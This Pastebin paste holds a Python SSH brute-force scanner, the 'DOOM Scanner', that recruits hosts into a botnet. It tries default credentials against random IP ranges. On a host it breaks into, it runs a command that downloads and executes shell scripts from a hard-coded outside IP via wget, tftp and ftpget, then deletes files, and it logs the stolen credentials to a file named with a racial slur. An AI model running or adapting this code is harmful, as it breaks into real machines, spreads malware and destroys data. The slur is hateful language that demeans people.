Advertisement
Guest User

Untitled

a guest
Feb 2nd, 2017
201
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.90 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. # DOOM PYTHON SCANNER MADE BY POODLE (KYRO REMASTERED)
  4. # IF YOU OWN THIS THEN YOUR NAME MUST BE POODLE :) NO OTHER ANSWER!
  5. #
  6. #
  7.  
  8. # MUST INSTALL THE FOLLOING BELOW
  9.  
  10. # yum update -y
  11.  
  12. # yum install nano -y
  13.  
  14. # yum install gcc python-paramiko -y
  15.  
  16. # nano /usr/include/bits/typesizes.h
  17.  
  18. # scroll down and edit the 1024 to 999999
  19.  
  20. # THEN SAVE IT
  21.  
  22. # ulimit -n 999999
  23.  
  24. # Usage: python DOOM.py THREADS RANGES 1(slow but effective) 2(fast but less effective) HERE IS A EXAMPLE
  25.  
  26. # python DOOM.py 500 5.78 101
  27.  
  28. # ^^^^^^^slow but affective ^^^^^^^^
  29.  
  30. # python DOOM.py 500 B 119.93 3
  31.  
  32. # ^^^^^^Fast But Not As stable^^^^^^
  33.  
  34. # Examples Below
  35.  
  36. # python DOOM.py 500 LUCKY 1 1
  37.  
  38. # python DOOM.py 500 LUCKY3 1 4
  39.  
  40. # python DOOM.py 500 LUCKY2 1 3
  41.  
  42. # python DOOM.py 500 B 49.144 3
  43.  
  44. #
  45.  
  46. # RANGES 113.53, 119.93, 122.3, 122.52, 101.109, 180.180, 125.27, 101.109
  47. import threading, paramiko, random, socket, time, sys
  48.  
  49. paramiko.util.log_to_file("/dev/null")
  50.  
  51. blacklist = [
  52. '127'
  53. ]
  54.  
  55. passwords = [
  56. "telnet:telnet"
  57. "admin:1234",
  58. "root:root",
  59. "ubnt:ubnt",
  60. "vagrant:vagrant",
  61. "pi:raspberry",
  62. "root:maxided"
  63. "root:123456",
  64. "root:Love2020",
  65. "root:Zero",
  66. "root:Password",
  67. "root:password",
  68. "root:qwerty",
  69. "root:dragon",
  70. "root:pussy",
  71. "root:baseball",
  72. "root:football",
  73. "root:monkey",
  74. "root:696969",
  75. "root:abc123"
  76. "admin:admin",
  77. "admin:1234",
  78. "admin:Guest",
  79. "ubnt:ubnt",
  80. "guest:guest",
  81. "user:user",
  82. "test:test",
  83.  
  84. ]
  85.  
  86. if sys.argv[4] == '1':
  87. passwords = ["root:root"] # ALRIGHT
  88. if sys.argv[4] == '2':
  89. passwords = ["guest:guest"] #EHH
  90. if sys.argv[4] == '3':
  91. passwords = ["admin:1234"] #ALRIGHT
  92. if sys.argv[4] == '4':
  93. passwords = ["telnet:telnet"] #SEXY
  94. if sys.argv[4] == '5':
  95. passwords = ["root:root", "admin:1234"]
  96.  
  97. print "\x1b[0;36m _____ _____ _____ __ __ \x1b[0;36m"
  98. print "\x1b[0;32m| _ \/ _ \/ _ \/ \/ \ \x1b[0;32m"
  99. print "\x1b[0;32m| | || | || | || \/ | \x1b[0;32m"
  100. print "\x1b[0;36m|_____/\_____/\_____/\__ \__/ \x1b[0;36m"
  101. print "\x1b[0;31m ~{DOOM Scanner By *Poodle*}~\x1b[0;31m"
  102. print "\x1b[0;31m Bots are now joining to the DOOM BoatNet\x1b[0;31m"
  103. print "\x1b[0;31m **KYRO REDESIGNED BY POODLE**\x1b[0;31m"
  104.  
  105. ipclassinfo = sys.argv[2]
  106. if ipclassinfo == "A":
  107. ip1 = sys.argv[3]
  108. elif ipclassinfo == "B":
  109. ip1 = sys.argv[3].split(".")[0]
  110. ip2 = sys.argv[3].split(".")[1]
  111. elif ipclassinfo == "C":
  112. ips = sys.argv[3].split(".")
  113. num=0
  114. for ip in ips:
  115. num=num+1
  116. if num == 1:
  117. ip1 = ip
  118. elif num == 2:
  119. ip2 = ip
  120. elif num == 3:
  121. ip3 = ip
  122. class sshscanner(threading.Thread):
  123. global passwords
  124. global ipclassinfo
  125. if ipclassinfo == "A":
  126. global ip1
  127. elif ipclassinfo == "B":
  128. global ip1
  129. global ip2
  130. elif ipclassinfo == "C":
  131. global ip1
  132. global ip2
  133. global ip3
  134. def run(self):
  135. while 1:
  136. try:
  137. while 1:
  138. thisipisbad='no'
  139. if ipclassinfo == "A":
  140. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  141. elif ipclassinfo == "B":
  142. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  143. elif ipclassinfo == "C":
  144. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  145. #DONT FUCK WITH ANY OF THIS STUFF
  146. elif ipclassinfo == "LUCKY":
  147. lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78"]
  148. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  149. elif ipclassinfo == "LUCKY2":
  150. lucky2 = lucky2 = [ "122.3","210.213","59.69","122.52","122.54","119.93","124.105","125.104","119.92","119.91","49.144" ]
  151. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  152. elif ipclassinfo == "LUCKY3":
  153. lucky2 = [ "103.20","103.30","103.47","103.57","12.188","12.34" ]
  154. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  155.  
  156. for badip in blacklist:
  157. if badip in self.host:
  158. thisipisbad='yes'
  159. if thisipisbad=='no':
  160. break
  161. username='root'
  162. password=""
  163. port = 22
  164. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  165. s.settimeout(3)
  166. s.connect((self.host, port))
  167. s.close()
  168. ssh = paramiko.SSHClient()
  169. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  170. dobreak=False
  171. for passwd in passwords:
  172. if ":n/a" in passwd:
  173. password=""
  174. else:
  175. password=passwd.split(":")[1]
  176. if "n/a:" in passwd:
  177. username=""
  178. else:
  179. username=passwd.split(":")[0]
  180. try:
  181. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  182. dobreak=True
  183. break
  184. except:
  185. pass
  186. if True == dobreak:
  187. break
  188. badserver=True
  189. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  190. output = stdout.read()
  191. if "inet addr" in output:
  192. badserver=False
  193. if badserver == False:
  194. print '\x1b[0;36mInfecting Poodlesbot ' +self.host+'|'+username+'|'+password+'|'+str(port)
  195. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.177.172.133/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 94.177.172.133 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 94.177.172.133; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 94.177.172.133 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
  196. nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  197. time.sleep(15)
  198. ssh.close()
  199. except:
  200. pass
  201.  
  202. for x in range(0,1500):
  203. try:
  204. t = sshscanner()
  205. t.start()
  206. except:
  207. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement